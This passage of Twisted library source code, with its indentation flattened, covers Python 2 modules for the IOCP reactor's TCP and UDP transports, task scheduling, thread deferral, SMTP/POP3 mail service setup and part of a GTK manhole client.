print "connecting to (%s, %s)" % (host, port)
if isinstance(port, types.StringTypes):
try:
port = socket.getservbyname(port, 'tcp')
except socket.error, e:
raise error.ServiceNameUnknownError(string=str(e))
self.addr= (host, port)
def resolveAddress(self):
host, port = self.addr
if isIPAddress(host):
return self.addr
else:
from twisted.internet import reactor
return reactor.resolve(host).addCallback(self._filterRealAddress)
def getDestination(self):
return address.IPv4Address('TCP', self.addr[0], self.addr[1], 'INET')
def buildAddress(self, addr):
return address.IPv4Address('TCP', addr[0], addr[1], 'INET')
```
#### File: internet/iocpreactor/udp.py
```python
import socket
import struct
import operator
from twisted.internet import interfaces, defer, error, protocol, address
from twisted.internet.udp import MulticastMixin
from twisted.internet.abstract import isIPAddress
from twisted.persisted import styles
from twisted.python import log, failure, reflect
from ops import ReadFileOp, WriteFileOp, WSARecvFromOp, WSASendToOp
from util import StateEventMachineType
from zope.interface import implements
ERROR_PORT_UNREACHABLE = 1234
class Port(log.Logger, styles.Ephemeral, object):
__metaclass__ = StateEventMachineType
implements(interfaces.IUDPTransport)
events = ["startListening", "stopListening", "write", "readDone", "readErr", "writeDone", "writeErr", "connect"]
sockinfo = (socket.AF_INET, socket.SOCK_DGRAM, 0)
read_op_class = WSARecvFromOp
write_op_class = WSASendToOp
reading = False
# Actual port number being listened on, only set to a non-None
# value when we are actually listening.
_realPortNumber = None
disconnected = property(lambda self: self.state == "disconnected")
def __init__(self, bindAddress, proto, maxPacketSize=8192):
assert isinstance(proto, protocol.DatagramProtocol)
self.state = "disconnected"
from twisted.internet import reactor
self.bindAddress = bindAddress
self._connectedAddr = None
self.protocol = proto
self.maxPacketSize = maxPacketSize
self.logstr = reflect.qual(self.protocol.__class__) + " (UDP)"
self.read_op = self.read_op_class(self)
self.readbuf = reactor.AllocateReadBuffer(maxPacketSize)
self.reactor = reactor
def __repr__(self):
if self._realPortNumber is not None:
return "<%s on %s>" % (self.protocol.__class__, self._realPortNumber)
else:
return "<%s not connected>" % (self.protocol.__class__,)
def handle_listening_connect(self, host, port):
if not isIPAddress(host):
raise ValueError, "please pass only IP addresses, not domain names"
self.state = "connecting"
return defer.maybeDeferred(self._connectDone, host, port)
def handle_connecting_connect(self, host, port):
raise RuntimeError, "already connected, reconnecting is not currently supported (talk to itamar if you want this)"
handle_connected_connect = handle_connecting_connect
def _connectDone(self, host, port):
self._connectedAddr = (host, port)
self.state = "connected"
self.socket.connect((host, port))
return self._connectedAddr
def handle_disconnected_startListening(self):
self._bindSocket()
host, port = self.bindAddress
if isIPAddress(host):
return defer.maybeDeferred(self._connectSocket, host)
else:
d = self.reactor.resolve(host)
d.addCallback(self._connectSocket)
return d
def _bindSocket(self):
try:
skt = socket.socket(*self.sockinfo)
skt.bind(self.bindAddress)
# print "bound %s to %s" % (skt.fileno(), self.bindAddress)
except socket.error, le:
raise error.CannotListenError, (None, None, le)
# Make sure that if we listened on port 0, we update that to
# reflect what the OS actually assigned us.
self._realPortNumber = skt.getsockname()[1]
log.msg("%s starting on %s"%(self.protocol.__class__, self._realPortNumber))
self.socket = skt
def _connectSocket(self, host):
self.bindAddress = (host, self.bindAddress[1])
self.protocol.makeConnection(self)
self.startReading()
self.state = "listening"
def startReading(self):
self.reading = True
try:
self.read_op.initiateOp(self.socket.fileno(), self.readbuf)
except WindowsError, we:
log.msg("initiating read failed with args %s" % (we,))
def stopReading(self):
self.reading = False
def handle_listening_readDone(self, bytes, addr = None):
if addr:
try:
self.protocol.datagramReceived(self.readbuf[:bytes], addr)
except:
log.err()
else:
self.protocol.datagramReceived(self.readbuf[:bytes])
if self.reading:
self.startReading()
handle_connecting_readDone = handle_listening_readDone
handle_connected_readDone = handle_listening_readDone
def handle_listening_readErr(self, ret, bytes):
log.msg("read failed with err %s" % (ret,))
# TODO: use Failures or something
if ret == ERROR_PORT_UNREACHABLE:
self.protocol.connectionRefused()
if self.reading:
self.startReading()
handle_connecting_readErr = handle_listening_readErr
handle_connected_readErr = handle_listening_readErr
def handle_disconnected_readErr(self, ret, bytes):
pass # no kicking the dead horse
def handle_disconnected_readDone(self, bytes, addr = None):
pass # no kicking the dead horse
def handle_listening_write(self, data, addr):
self.performWrite(data, addr)
def handle_connected_write(self, data, addr = None):
assert addr in (None, self._connectedAddr)
self.performWrite(data, addr)
def performWrite(self, data, addr = None):
# print "performing write on", data, addr
self.writing = True
try:
write_op = self.write_op_class(self)
if not addr:
addr = self._connectedAddr
write_op.initiateOp(self.socket.fileno(), data, addr)
# print "initiating write_op to", addr
except WindowsError, we:
log.msg("initiating write failed with args %s" % (we,))
def handle_listening_writeDone(self, bytes):
log.msg("write success with bytes %s" % (bytes,))
# self.callBufferHandlers(event = "buffer empty")
handle_connecting_writeDone = handle_listening_writeDone
handle_connected_writeDone = handle_listening_writeDone
def handle_listening_writeErr(self, ret, bytes):
log.msg("write failed with err %s" % (ret,))
if ret == ERROR_PORT_UNREACHABLE:
self.protocol.connectionRefused()
handle_connecting_writeErr = handle_listening_writeErr
handle_connected_writeErr = handle_listening_writeErr
def handle_disconnected_writeErr(self, ret, bytes):
pass # no kicking the dead horse
def handle_disconnected_writeDone(self, bytes):
pass # no kicking the dead horse
def writeSequence(self, seq, addr):
self.write("".join(seq), addr)
def handle_listening_stopListening(self):
self.stopReading()
self.connectionLost()
handle_connecting_stopListening = handle_listening_stopListening
handle_connected_stopListening = handle_listening_stopListening
def connectionLost(self, reason=None):
log.msg('(Port %s Closed)' % self._realPortNumber)
self._realPortNumber = None
self.protocol.doStop()
self.socket.close()
del self.socket
self.state = "disconnected"
def logPrefix(self):
return self.logstr
def getHost(self):
return address.IPv4Address('UDP', *(self.socket.getsockname() + ('INET_UDP',)))
class MulticastPort(MulticastMixin, Port):
"""UDP Port that supports multicasting."""
implements(interfaces.IMulticastTransport)
def __init__(self, bindAddress, proto, maxPacketSize=8192, listenMultiple=False):
Port.__init__(self, bindAddress, proto, maxPacketSize)
self.listenMultiple = listenMultiple
def createInternetSocket(self):
skt = Port.createInternetSocket(self)
if self.listenMultiple:
skt.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if hasattr(socket, "SO_REUSEPORT"):
skt.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
return skt
```
#### File: internet/iocpreactor/util.py
```python
from twisted.python import log
class StateEventMachineType(type):
def makeHandleGetter(klass, name):
def helpful(self):
# log.msg("looking up %s in state %s" % (name, self.state))
return getattr(self, "handle_%s_%s" % (self.state, name))
return helpful
makeHandleGetter = classmethod(makeHandleGetter)
def makeMethodProxy(klass, name):
def helpful(self, *a, **kw):
return getattr(self, "handle_%s_%s" % (self.state, name))(*a, **kw)
return helpful
makeMethodProxy = classmethod(makeMethodProxy)
# def __new__(klass, name, bases, attrs):
# for e in name.events:
# attrs[e] = property(klass.makeHandleGetter(e))
# return type.__new__(klass, name, bases, attrs)
def __init__(klass, name, bases, attrs):
type.__init__(klass, name, bases, attrs)
# print "making a class", klass, "with events", klass.events
for e in klass.events:
# setattr(klass, e, property(klass.makeHandleGetter(e)))
setattr(klass, e, klass.makeMethodProxy(e))
```
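A hedged illustration of the metaclass above: every name listed in `events` becomes a proxy method that forwards to `handle_<state>_<event>`. The `Door` class is made up, and the import path is assumed from the file layout.
```python
# Illustration of StateEventMachineType dispatch; Door is made up.
# Import path assumed from the file layout above.
from twisted.internet.iocpreactor.util import StateEventMachineType

class Door(object):
    __metaclass__ = StateEventMachineType
    events = ["push"]

    def __init__(self):
        self.state = "closed"

    def handle_closed_push(self):
        self.state = "open"
        return "opened"

    def handle_open_push(self):
        return "already open"

d = Door()
print d.push()  # -> 'opened'       (dispatched to handle_closed_push)
print d.push()  # -> 'already open' (dispatched to handle_open_push)
```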
#### File: twisted/internet/pyuisupport.py
```python
import pyui
def _guiUpdate(reactor, delay):
pyui.draw()
if pyui.update() == 0:
pyui.quit()
reactor.stop()
else:
reactor.callLater(delay, _guiUpdate, reactor, delay)
def install(ms=10, reactor=None, args=(), kw={}):
"""
Schedule PyUI's display to be updated approximately every C{ms}
milliseconds, and initialize PyUI with the specified arguments.
"""
d = pyui.init(*args, **kw)
if reactor is None:
from twisted.internet import reactor
_guiUpdate(reactor, ms / 1000.0)
return d
__all__ = ["install"]
```
#### File: twisted/internet/task.py
```python
__metaclass__ = type
import time
from twisted.python.runtime import seconds
from twisted.python import reflect
from twisted.internet import base, defer
class LoopingCall:
"""Call a function repeatedly.
@ivar f: The function to call.
@ivar a: A tuple of arguments to pass the function.
@ivar kw: A dictionary of keyword arguments to pass to the function.
If C{f} returns a deferred, rescheduling will not take place until the
deferred has fired. The result value is ignored.
"""
call = None
running = False
deferred = None
interval = None
count = None
starttime = None
def _callLater(self, delay):
from twisted.internet import reactor
return reactor.callLater(delay, self)
_seconds = staticmethod(seconds)
def __init__(self, f, *a, **kw):
self.f = f
self.a = a
self.kw = kw
def start(self, interval, now=True):
"""Start running function every interval seconds.
@param interval: The number of seconds between calls. May be
less than one. Precision will depend on the underlying
platform, the available hardware, and the load on the system.
@param now: If True, run this call right now. Otherwise, wait
until the interval has elapsed before beginning.
@return: A Deferred whose callback will be invoked with
C{self} when C{self.stop} is called, or whose errback will be
invoked when the function raises an exception or returns a
deferred that has its errback invoked.
"""
assert not self.running, ("Tried to start an already running "
"LoopingCall.")
if interval < 0:
raise ValueError, "interval must be >= 0"
self.running = True
d = self.deferred = defer.Deferred()
self.starttime = self._seconds()
self.count = 0
self.interval = interval
if now:
self()
else:
self._reschedule()
return d
def stop(self):
"""Stop running function.
"""
assert self.running, ("Tried to stop a LoopingCall that was "
"not running.")
self.running = False
if self.call is not None:
self.call.cancel()
self.call = None
d, self.deferred = self.deferred, None
d.callback(self)
def __call__(self):
def cb(result):
if self.running:
self._reschedule()
else:
d, self.deferred = self.deferred, None
d.callback(self)
def eb(failure):
self.running = False
d, self.deferred = self.deferred, None
d.errback(failure)
self.call = None
d = defer.maybeDeferred(self.f, *self.a, **self.kw)
d.addCallback(cb)
d.addErrback(eb)
def _reschedule(self):
if self.interval == 0:
self.call = self._callLater(0)
return
fromNow = self.starttime - self._seconds()
while self.running:
self.count += 1
fromStart = self.count * self.interval
delay = fromNow + fromStart
if delay > 0:
self.call = self._callLater(delay)
return
def __repr__(self):
if hasattr(self.f, 'func_name'):
func = self.f.func_name
if hasattr(self.f, 'im_class'):
func = self.f.im_class.__name__ + '.' + func
else:
func = reflect.safe_repr(self.f)
return 'LoopingCall<%r>(%s, *%s, **%s)' % (
self.interval, func, reflect.safe_repr(self.a),
reflect.safe_repr(self.kw))
class SchedulerStopped(Exception):
"""
The operation could not complete because the scheduler was stopped in
progress or was already stopped.
"""
class _Timer(object):
MAX_SLICE = 0.01
def __init__(self):
self.end = time.time() + self.MAX_SLICE
def __call__(self):
return time.time() >= self.end
_EPSILON = 0.00000001
def _defaultScheduler(x):
from twisted.internet import reactor
return reactor.callLater(_EPSILON, x)
class Cooperator(object):
"""
Cooperative task scheduler.
"""
def __init__(self,
terminationPredicateFactory=_Timer,
scheduler=_defaultScheduler,
started=True):
"""
Create a scheduler-like object to which iterators may be added.
@param terminationPredicateFactory: A no-argument callable which will
be invoked at the beginning of each step and should return a
no-argument callable which will return False when the step should be
terminated. The default factory is time-based and allows iterators to
run for 1/100th of a second at a time.
@param scheduler: A one-argument callable which takes a no-argument
callable and should invoke it at some future point. This will be used
to schedule each step of this Cooperator.
@param started: A boolean which indicates whether iterators should be
stepped as soon as they are added, or if they will be queued up until
L{Cooperator.start} is called.
"""
self.iterators = []
self._metarator = iter(())
self._terminationPredicateFactory = terminationPredicateFactory
self._scheduler = scheduler
self._delayedCall = None
self._stopped = False
self._started = started
def coiterate(self, iterator, doneDeferred=None):
"""
Add an iterator to the list of iterators I am currently running.
@return: a Deferred that will fire when the iterator finishes.
"""
if doneDeferred is None:
doneDeferred = defer.Deferred()
if self._stopped:
doneDeferred.errback(SchedulerStopped())
return doneDeferred
self.iterators.append((iterator, doneDeferred))
self._reschedule()
return doneDeferred
def _tasks(self):
terminator = self._terminationPredicateFactory()
while self.iterators:
for i in self._metarator:
yield i
if terminator():
return
self._metarator = iter(self.iterators)
def _tick(self):
"""
Run one scheduler tick.
"""
self._delayedCall = None
for taskObj in self._tasks():
iterator, doneDeferred = taskObj
try:
result = iterator.next()
except StopIteration:
self.iterators.remove(taskObj)
doneDeferred.callback(iterator)
except:
self.iterators.remove(taskObj)
doneDeferred.errback()
else:
if isinstance(result, defer.Deferred):
self.iterators.remove(taskObj)
def cbContinue(result, taskObj=taskObj):
self.coiterate(*taskObj)
result.addCallbacks(cbContinue, doneDeferred.errback)
self._reschedule()
_mustScheduleOnStart = False
def _reschedule(self):
if not self._started:
self._mustScheduleOnStart = True
return
if self._delayedCall is None and self.iterators:
self._delayedCall = self._scheduler(self._tick)
def start(self):
"""
Begin scheduling steps.
"""
self._stopped = False
self._started = True
if self._mustScheduleOnStart:
del self._mustScheduleOnStart
self._reschedule()
def stop(self):
"""
Stop scheduling steps. Errback the completion Deferreds of all
iterators which have been added and forget about them.
"""
self._stopped = True
for iterator, doneDeferred in self.iterators:
doneDeferred.errback(SchedulerStopped())
self.iterators = []
if self._delayedCall is not None:
self._delayedCall.cancel()
self._delayedCall = None
_theCooperator = Cooperator()
def coiterate(iterator):
"""
Cooperatively iterate over the given iterator, dividing runtime between it
and all other iterators which have been passed to this function and not yet
exhausted.
"""
return _theCooperator.coiterate(iterator)
class Clock:
"""
Provide a deterministic, easily-controlled implementation of
L{IReactorTime.callLater}. This is commonly useful for writing
deterministic unit tests for code which schedules events using this API.
"""
rightNow = 0.0
def __init__(self):
self.calls = []
def seconds(self):
"""
Pretend to be time.time(). This is used internally when an operation
such as L{IDelayedCall.reset} needs to determine a time value
relative to the current time.
@rtype: C{float}
@return: The time which should be considered the current time.
"""
return self.rightNow
def callLater(self, when, what, *a, **kw):
"""
See L{twisted.internet.interfaces.IReactorTime.callLater}.
"""
self.calls.append(
base.DelayedCall(self.seconds() + when,
what, a, kw,
self.calls.remove,
lambda c: None,
self.seconds))
self.calls.sort(lambda a, b: cmp(a.getTime(), b.getTime()))
return self.calls[-1]
def advance(self, amount):
"""
Move time on this clock forward by the given amount and run whatever
pending calls should be run.
@type amount: C{float}
@param amount: The number of seconds which to advance this clock's
time.
"""
self.rightNow += amount
while self.calls and self.calls[0].getTime() <= self.seconds():
call = self.calls.pop(0)
call.called = 1
call.func(*call.args, **call.kw)
def pump(self, timings):
"""
Advance incrementally by the given set of times.
@type timings: iterable of C{float}
"""
for amount in timings:
self.advance(amount)
__all__ = [
'LoopingCall',
'Clock',
'SchedulerStopped', 'Cooperator', 'coiterate',
]
```
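A small sketch of how `Clock` above can drive time-based code deterministically; the delays and appended values are arbitrary.
```python
# Sketch: Clock.advance() runs whatever scheduled calls have become due.
from twisted.internet.task import Clock

clock = Clock()
fired = []

clock.callLater(2.0, fired.append, "two")
clock.callLater(5.0, fired.append, "five")

clock.advance(1.0)
assert fired == []               # nothing due yet
clock.advance(1.5)
assert fired == ["two"]          # the 2-second call has run
clock.advance(10.0)
assert fired == ["two", "five"]  # the 5-second call has run too
```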
#### File: twisted/internet/threads.py
```python
from twisted.python import log, failure
# sibling imports
from twisted.internet import defer
def _putResultInDeferred(deferred, f, args, kwargs):
"""Run a function and give results to a Deferred."""
from twisted.internet import reactor
try:
result = f(*args, **kwargs)
except:
f = failure.Failure()
reactor.callFromThread(deferred.errback, f)
else:
reactor.callFromThread(deferred.callback, result)
def deferToThread(f, *args, **kwargs):
"""Run function in thread and return result as Deferred."""
d = defer.Deferred()
from twisted.internet import reactor
reactor.callInThread(_putResultInDeferred, d, f, args, kwargs)
return d
def _runMultiple(tupleList):
"""Run a list of functions."""
for f, args, kwargs in tupleList:
f(*args, **kwargs)
def callMultipleInThread(tupleList):
"""Run a list of functions in the same thread.
tupleList should be a list of (function, argsList, kwargsDict) tuples.
"""
from twisted.internet import reactor
reactor.callInThread(_runMultiple, tupleList)
__all__ = ["deferToThread", "callMultipleInThread"]
```
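A usage sketch for `deferToThread` above; the `slowSquare` function is a stand-in for any blocking work.
```python
# Sketch: run a blocking function in the reactor threadpool and get the
# result back on the main thread via a Deferred.
import time
from twisted.internet import reactor
from twisted.internet.threads import deferToThread

def slowSquare(x):
    time.sleep(1)  # stands in for blocking work
    return x * x

def printResult(result):
    print result
    reactor.stop()

d = deferToThread(slowSquare, 7)
d.addCallback(printResult)
reactor.run()
```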
#### File: twisted/mail/protocols.py
```python
from twisted.mail import pop3
from twisted.mail import smtp
from twisted.internet import protocol
from twisted.internet import defer
from twisted.copyright import longversion
from twisted.python import log
from twisted import cred
import twisted.cred.error
import twisted.cred.credentials
from twisted.mail import relay
from zope.interface import implements
class DomainDeliveryBase:
"""A server that uses twisted.mail service's domains."""
implements(smtp.IMessageDelivery)
service = None
protocolName = None
def __init__(self, service, user, host=smtp.DNSNAME):
self.service = service
self.user = user
self.host = host
def receivedHeader(self, helo, origin, recipients):
authStr = heloStr = ""
if self.user:
authStr = " auth=%s" % (self.user.encode('xtext'),)
if helo[0]:
heloStr = " helo=%s" % (helo[0],)
from_ = "from %s ([%s]%s%s)" % (helo[0], helo[1], heloStr, authStr)
by = "by %s with %s (%s)" % (
self.host, self.protocolName, longversion
)
for_ = "for <%s>; %s" % (' '.join(map(str, recipients)), smtp.rfc822date())
return "Received: %s\n\t%s\n\t%s" % (from_, by, for_)
def validateTo(self, user):
# XXX - Yick. This needs cleaning up.
if self.user and self.service.queue:
d = self.service.domains.get(user.dest.domain, None)
if d is None:
d = relay.DomainQueuer(self.service, True)
else:
d = self.service.domains[user.dest.domain]
return defer.maybeDeferred(d.exists, user)
def validateFrom(self, helo, origin):
if not helo:
raise smtp.SMTPBadSender(origin, 503, "Who are you? Say HELO first.")
if origin.local != '' and origin.domain == '':
raise smtp.SMTPBadSender(origin, 501, "Sender address must contain domain.")
return origin
def startMessage(self, users):
ret = []
for user in users:
ret.append(self.service.domains[user.dest.domain].startMessage(user))
return ret
class SMTPDomainDelivery(DomainDeliveryBase):
protocolName = 'smtp'
class ESMTPDomainDelivery(DomainDeliveryBase):
protocolName = 'esmtp'
class DomainSMTP(SMTPDomainDelivery, smtp.SMTP):
service = user = None
def __init__(self, *args, **kw):
import warnings
warnings.warn(
"DomainSMTP is deprecated. Use IMessageDelivery objects instead.",
DeprecationWarning, stacklevel=2,
)
smtp.SMTP.__init__(self, *args, **kw)
if self.delivery is None:
self.delivery = self
class DomainESMTP(ESMTPDomainDelivery, smtp.ESMTP):
service = user = None
def __init__(self, *args, **kw):
import warnings
warnings.warn(
"DomainESMTP is deprecated. Use IMessageDelivery objects instead.",
DeprecationWarning, stacklevel=2,
)
smtp.ESMTP.__init__(self, *args, **kw)
if self.delivery is None:
self.delivery = self
class SMTPFactory(smtp.SMTPFactory):
"""A protocol factory for SMTP."""
protocol = smtp.SMTP
portal = None
def __init__(self, service, portal = None):
smtp.SMTPFactory.__init__(self)
self.service = service
self.portal = portal
def buildProtocol(self, addr):
log.msg('Connection from %s' % (addr,))
p = smtp.SMTPFactory.buildProtocol(self, addr)
p.service = self.service
p.portal = self.portal
return p
class ESMTPFactory(SMTPFactory):
protocol = smtp.ESMTP
context = None
def __init__(self, *args):
SMTPFactory.__init__(self, *args)
self.challengers = {
'CRAM-MD5': cred.credentials.CramMD5Credentials
}
def buildProtocol(self, addr):
p = SMTPFactory.buildProtocol(self, addr)
p.challengers = self.challengers
p.ctx = self.context
return p
class VirtualPOP3(pop3.POP3):
"""Virtual hosting POP3."""
service = None
domainSpecifier = '@' # Gaagh! I hate POP3. No standardized way
# to indicate user@host. '@' doesn't work
# with NS, e.g.
def authenticateUserAPOP(self, user, digest):
# Override the default lookup scheme to allow virtual domains
user, domain = self.lookupDomain(user)
try:
portal = self.service.lookupPortal(domain)
except KeyError:
return defer.fail(cred.error.UnauthorizedLogin())
else:
return portal.login(
pop3.APOPCredentials(self.magic, user, digest),
None,
pop3.IMailbox
)
def authenticateUserPASS(self, user, password):
user, domain = self.lookupDomain(user)
try:
portal = self.service.lookupPortal(domain)
except KeyError:
return defer.fail(cred.error.UnauthorizedLogin())
else:
return portal.login(
cred.credentials.UsernamePassword(user, password),
None,
pop3.IMailbox
)
def lookupDomain(self, user):
try:
user, domain = user.split(self.domainSpecifier, 1)
except ValueError:
domain = ''
if domain not in self.service.domains:
raise pop3.POP3Error("no such domain %s" % domain)
return user, domain
class POP3Factory(protocol.ServerFactory):
"""POP3 protocol factory."""
protocol = VirtualPOP3
service = None
def __init__(self, service):
self.service = service
def buildProtocol(self, addr):
p = protocol.ServerFactory.buildProtocol(self, addr)
p.service = self.service
return p
#
# It is useful to know, perhaps, that the required file for this to work can
# be created thusly:
#
# openssl req -x509 -newkey rsa:2048 -keyout file.key -out file.crt \
# -days 365 -nodes
#
# And then cat file.key and file.crt together. The number of days and bits
# can be changed, of course.
#
class SSLContextFactory:
"""An SSL Context Factory
This loads a certificate and private key from a specified file.
"""
def __init__(self, filename):
self.filename = filename
def getContext(self):
"""Create an SSL context."""
from OpenSSL import SSL
ctx = SSL.Context(SSL.SSLv23_METHOD)
ctx.use_certificate_file(self.filename)
ctx.use_privatekey_file(self.filename)
return ctx
```
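For reference, a minimal usage sketch of the `SSLContextFactory` defined above. It assumes a hypothetical `server.pem` built by concatenating `file.key` and `file.crt` as the preceding comment describes; the listener call in the trailing comment is only an illustration of where such a context factory is normally handed off.

```python
# Illustrative sketch only; "server.pem" is a hypothetical combined key+cert file.
from twisted.mail.protocols import SSLContextFactory

ctxFactory = SSLContextFactory('server.pem')
ctx = ctxFactory.getContext()        # an OpenSSL SSL.Context
# ctxFactory can be passed wherever Twisted expects a context factory,
# e.g. reactor.listenSSL(995, pop3Factory, ctxFactory)
```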
#### File: twisted/mail/tap.py
```python
import os
import sys
from twisted.mail import mail
from twisted.mail import maildir
from twisted.mail import relay
from twisted.mail import relaymanager
from twisted.mail import alias
from twisted.python import usage
from twisted.cred import checkers
from twisted.application import internet
class Options(usage.Options):
synopsis = "Usage: mktap mail [options]"
optParameters = [
["pop3", "p", 8110, "Port to start the POP3 server on (0 to disable)."],
["pop3s", "S", 0, "Port to start the POP3-over-SSL server on (0 to disable)."],
["smtp", "s", 8025, "Port to start the SMTP server on (0 to disable)."],
["certificate", "c", None, "Certificate file to use for SSL connections"],
["relay", "R", None,
"Relay messages according to their envelope 'To', using the given"
"path as a queue directory."],
["hostname", "H", None, "The hostname by which to identify this server."],
]
optFlags = [
["esmtp", "E", "Use RFC 1425/1869 SMTP extensions"],
["disable-anonymous", None, "Disallow non-authenticated SMTP connections"],
]
zsh_actions = {"hostname" : "_hosts"}
longdesc = "This creates a mail.tap file that can be used by twistd."
def __init__(self):
usage.Options.__init__(self)
self.service = mail.MailService()
self.last_domain = None
def opt_passwordfile(self, filename):
"""Specify a file containing username:password login info for authenticated ESMTP connections."""
ch = checkers.OnDiskUsernamePasswordDatabase(filename)
self.service.smtpPortal.registerChecker(ch)
opt_P = opt_passwordfile
def opt_default(self):
"""Make the most recently specified domain the default domain."""
if self.last_domain:
self.service.addDomain('', self.last_domain)
else:
raise usage.UsageError("Specify a domain before specifying using --default")
opt_D = opt_default
def opt_maildirdbmdomain(self, domain):
"""generate an SMTP/POP3 virtual domain which saves to \"path\"
"""
try:
name, path = domain.split('=')
except ValueError:
raise usage.UsageError("Argument to --maildirdbmdomain must be of the form 'name=path'")
self.last_domain = maildir.MaildirDirdbmDomain(self.service, os.path.abspath(path))
self.service.addDomain(name, self.last_domain)
opt_d = opt_maildirdbmdomain
def opt_user(self, user_pass):
"""add a user/password to the last specified domains
"""
try:
user, password = user_pass.split('=', 1)
except ValueError:
raise usage.UsageError("Argument to --user must be of the form 'user=password'")
if self.last_domain:
self.last_domain.addUser(user, password)
else:
raise usage.UsageError("Specify a domain before specifying users")
opt_u = opt_user
def opt_bounce_to_postmaster(self):
"""undelivered mails are sent to the postmaster
"""
self.last_domain.postmaster = 1
opt_b = opt_bounce_to_postmaster
def opt_aliases(self, filename):
"""Specify an aliases(5) file to use for this domain"""
if self.last_domain is not None:
if mail.IAliasableDomain.providedBy(self.last_domain):
aliases = alias.loadAliasFile(self.service.domains, filename)
self.last_domain.setAliasGroup(aliases)
self.service.monitor.monitorFile(
filename,
AliasUpdater(self.service.domains, self.last_domain)
)
else:
raise usage.UsageError(
"%s does not support alias files" % (
self.last_domain.__class__.__name__,
)
)
else:
raise usage.UsageError("Specify a domain before specifying aliases")
opt_A = opt_aliases
def postOptions(self):
for f in ('pop3', 'smtp', 'pop3s'):
try:
self[f] = int(self[f])
if not (0 <= self[f] < 2 ** 16):
raise ValueError
except ValueError:
raise usage.UsageError(
'Invalid port specified to --%s: %s' % (f, self[f])
)
if self['pop3s']:
if not self['certificate']:
raise usage.UsageError("Cannot specify --pop3s without "
"--certificate")
elif not os.path.exists(self['certificate']):
raise usage.UsageError("Certificate file %r does not exist."
% self['certificate'])
if not self['disable-anonymous']:
self.service.smtpPortal.registerChecker(checkers.AllowAnonymousAccess())
if not (self['pop3'] or self['smtp'] or self['pop3s']):
raise usage.UsageError("You cannot disable all protocols")
class AliasUpdater:
def __init__(self, domains, domain):
self.domains = domains
self.domain = domain
def __call__(self, new):
self.domain.setAliasGroup(alias.loadAliasFile(self.domains, new))
def makeService(config):
if config['esmtp']:
rmType = relaymanager.SmartHostESMTPRelayingManager
smtpFactory = config.service.getESMTPFactory
else:
rmType = relaymanager.SmartHostSMTPRelayingManager
smtpFactory = config.service.getSMTPFactory
if config['relay']:
dir = config['relay']
if not os.path.isdir(dir):
os.mkdir(dir)
config.service.setQueue(relaymanager.Queue(dir))
default = relay.DomainQueuer(config.service)
manager = rmType(config.service.queue)
if config['esmtp']:
manager.fArgs += (None, None)
manager.fArgs += (config['hostname'],)
helper = relaymanager.RelayStateHelper(manager, 1)
helper.setServiceParent(config.service)
config.service.domains.setDefaultDomain(default)
ctx = None
if config['certificate']:
from twisted.mail.protocols import SSLContextFactory
ctx = SSLContextFactory(config['certificate'])
if config['pop3']:
s = internet.TCPServer(config['pop3'], config.service.getPOP3Factory())
s.setServiceParent(config.service)
if config['pop3s']:
s = internet.SSLServer(config['pop3s'],
config.service.getPOP3Factory(), ctx)
s.setServiceParent(config.service)
if config['smtp']:
f = smtpFactory()
f.context = ctx
if config['hostname']:
f.domain = config['hostname']
f.fArgs = (f.domain,)
if config['esmtp']:
f.fArgs = (None, None) + f.fArgs
s = internet.TCPServer(config['smtp'], f)
s.setServiceParent(config.service)
return config.service
```
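A hedged sketch of driving the `Options`/`makeService` pair above directly, outside of mktap/twistd. The domain path, user/password, and port values are placeholders chosen only to satisfy the option handlers shown in the code.

```python
# Sketch only: exercise the tap's option parser and service builder by hand.
from twisted.mail.tap import Options, makeService

config = Options()
config.parseOptions([
    '--maildirdbmdomain', 'example.com=/tmp/example.com',  # name=path
    '--user', 'alice=secret',                              # user=password
    '--default',                                           # make it the default domain
    '--pop3', '8110',
    '--smtp', '8025',
])
svc = makeService(config)   # a MailService ready to be attached to an Application
```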
#### File: manhole/ui/gtkmanhole.py
```python
import code, string, sys, traceback, types
import gtk
from twisted.python import rebuild, util
from twisted.spread.ui import gtkutil
from twisted.spread import pb
from twisted.manhole import explorer
True = gtk.TRUE
False = gtk.FALSE
try:
import spelunk_gnome
except ImportError:
_GNOME_POWER = False
else:
_GNOME_POWER = True
## def findBeginningOfLineWithPoint(entry):
## pos = entry.get_point()
## while pos:
## pos = pos - 1
## c = entry.get_chars(pos, pos+1)
## if c == '\n':
## return pos+1
## return 0
import pywidgets
class Interaction(pywidgets.Interaction, pb.Referenceable):
loginWindow = None
capabilities = {
"Explorer": 'Set',
}
def __init__(self):
pywidgets.Interaction.__init__(self)
self.signal_connect('destroy', gtk.mainquit, None)
if _GNOME_POWER:
self.display = BrowserDisplay()
dWindow = gtk.GtkWindow(title="Spelunking")
dWindow.add(self.display)
dWindow.show_all()
self.display.makeDefaultCanvas()
else:
self.display = BrowserDisplay(self)
# The Referenceable attached to the Perspective
self.client = self
def remote_console(self, message):
self.output.console(message)
def remote_receiveExplorer(self, xplorer):
if _GNOME_POWER:
self.display.receiveExplorer(xplorer)
else:
XXX # text display?
def remote_listCapabilities(self):
return self.capabilities
def connected(self, perspective):
self.loginWindow.hide()
self.name = self.loginWindow.username.get_text()
self.hostname = self.loginWindow.hostname.get_text()
perspective.broker.notifyOnDisconnect(self.connectionLost)
self.perspective = perspective
self.show_all()
self.set_title("Manhole: %s@%s" % (self.name, self.hostname))
def connectionLost(self, reason=None):
if not reason:
reason = "Connection Lost"
self.loginWindow.loginReport(reason)
self.hide()
self.loginWindow.show()
def codeInput(self, text):
methodName = 'do'
if text[0] == '/':
split = string.split(text[1:],' ',1)
statement = split[0]
if len(split) == 2:
remainder = split[1]
if statement in ('browse', 'explore'):
methodName = 'explore'
text = remainder
elif statement == 'watch':
methodName = 'watch'
text = remainder
elif statement == 'self_rebuild':
rebuild.rebuild(explorer)
if _GNOME_POWER:
rebuild.rebuild(spelunk_gnome)
rebuild.rebuild(sys.modules[__name__])
return
try:
self.perspective.callRemote(methodName, text)
except pb.ProtocolError:
# ASSUMPTION: pb.ProtocolError means we lost our connection.
(eType, eVal, tb) = sys.exc_info()
del tb
s = string.join(traceback.format_exception_only(eType, eVal),
'')
self.connectionLost(s)
except:
traceback.print_exc()
gtk.mainquit()
class LineOrientedBrowserDisplay:
def __init__(self, toplevel=None):
if toplevel:
self.toplevel = toplevel
def receiveBrowserObject(self, obj):
"""Display a browser ObjectLink.
"""
# This is a stop-gap implementation. Ideally, everything
# would be nicely formatted with pretty colours and you could
# select referenced objects to browse them with
# browse(selectedLink.identifier)
